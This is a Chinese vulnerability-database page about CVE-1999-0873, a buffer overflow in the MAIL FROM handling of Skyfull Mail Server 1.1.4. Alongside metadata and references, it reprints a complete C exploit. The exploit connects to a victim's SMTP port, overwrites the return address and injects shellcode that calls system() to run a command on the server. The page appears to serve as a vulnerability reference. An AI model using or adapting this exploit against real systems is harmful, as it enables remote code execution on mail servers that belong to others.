Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞

Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞

漏洞ID 1105583 漏洞类型 缓冲区溢出
发布时间 1999-10-30 更新时间 2005-05-02
图片[1]-Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0873
图片[2]-Skyfull邮件服务器 MAIL FROM缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199910-055
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19584
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199910-055
|漏洞详情
Skyfull邮件服务器存在缓冲区溢出漏洞。可以借助MAILFROM指令导致该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/759/info

The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed.

/*=============================================================================
   Skyfull Mail Server Version 1.1.4 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN ([email protected])
  =============================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h>
#include    <winsock.h>

#define     MAXBUF          3000
#define     RETADR          655
#define     JMPADR          651
#define     SMTP_PORT       25
#define     JMPEAX_ADR      0xbfe0a035

unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

main(int argc,char *argv[])
{
    SOCKET               sock;
    SOCKADDR_IN          addr;
    WSADATA              wsa;
    WORD                 wVersionRequested;
    unsigned int         ip,p1,p2;
    static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
    struct hostent       *hs;

    if (argc<2){
        printf("usage: %s VictimHostn",argv[0]); return -1;
    }
    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.n"); return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.n"); return -1;
    }
    addr.sin_family     = AF_INET;
    addr.sin_port       = htons((u_short)SMTP_PORT);
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if ((hs=gethostbyname(argv[1]))==NULL){
                printf("Can not resolve specified host.n"); return -1;
            }
            addr.sin_family = hs->h_addrtype;
            memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.n"); return -1;
    }
    recv(sock,packetbuf,MAXBUF,0);
    printf("BANNER FROM "%s" : %sn",argv[1],packetbuf);

    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    ip=JMPEAX_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[JMPADR  ]=0xeb;
    buf[JMPADR+1]=0x80;

    strcat(exploit_code,cmdbuf);
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x0d]=p1&0xff;
    exploit_code[0x0e]=(p1>>8)&0xff;
    exploit_code[0x0f]=(p1>>16)&0xff;
    exploit_code[0x10]=(p1>>24)&0xff;
    exploit_code[0x1e]=p2&0xff;
    exploit_code[0x1f]=(p2>>8)&0xff;
    exploit_code[0x20]=(p2>>16)&0xff;
    exploit_code[0x21]=(p2>>24)&0xff;
   
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));

    sprintf(packetbuf,"HELO UNYUNn");
    send(sock,packetbuf,strlen(packetbuf),0);
    recv(sock,packetbuf,MAXBUF,0);
    printf("HELO: Reply from "%s" : %sn",argv[1],packetbuf);
    sprintf(packetbuf,"MAIL FROM: UNYUN <%[email protected]>rn",buf);
    send(sock,packetbuf,strlen(packetbuf),0);
    closesocket(sock);
    printf("Done.n");
    return FALSE;
}
|参考资料

来源:BID
名称:759
链接:http://www.securityfocus.com/bid/759

相关推荐: ntop Remote Format String Vulnerability

ntop Remote Format String Vulnerability 漏洞ID 1102370 漏洞类型 Input Validation Error 发布时间 2002-02-28 更新时间 2002-02-28 CVE编号 N/A CNNVD-I…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享